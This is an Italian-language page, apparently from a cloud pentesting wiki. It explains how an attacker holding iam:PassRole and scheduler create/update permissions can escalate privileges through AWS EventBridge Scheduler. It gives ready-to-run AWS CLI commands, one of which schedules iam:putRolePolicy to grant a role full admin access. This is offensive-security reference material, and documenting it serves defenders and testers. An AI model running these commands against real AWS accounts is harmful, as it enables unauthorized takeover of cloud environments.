AWS - EventBridge Scheduler Privesc

Reading time: 3 minutes

EventBridge Scheduler

Ulteriori informazioni su EventBridge Scheduler in:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Un attaccante con questi permessi sarà in grado di creare|aggiornare un scheduler e abusare dei permessi del ruolo dello scheduler ad esso associato per eseguire qualsiasi azione

Ad esempio, potrebbero configurare il programma per invochare una funzione Lambda che è un'azione templata:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Oltre alle azioni di servizio templated, puoi utilizzare universal targets in EventBridge Scheduler per invocare un'ampia gamma di operazioni API per molti servizi AWS. Gli universal targets offrono flessibilità per invocare quasi qualsiasi API. Un esempio può essere l'uso di universal targets aggiungendo "AdminAccessPolicy", utilizzando un ruolo che ha la policy "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Riferimenti

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html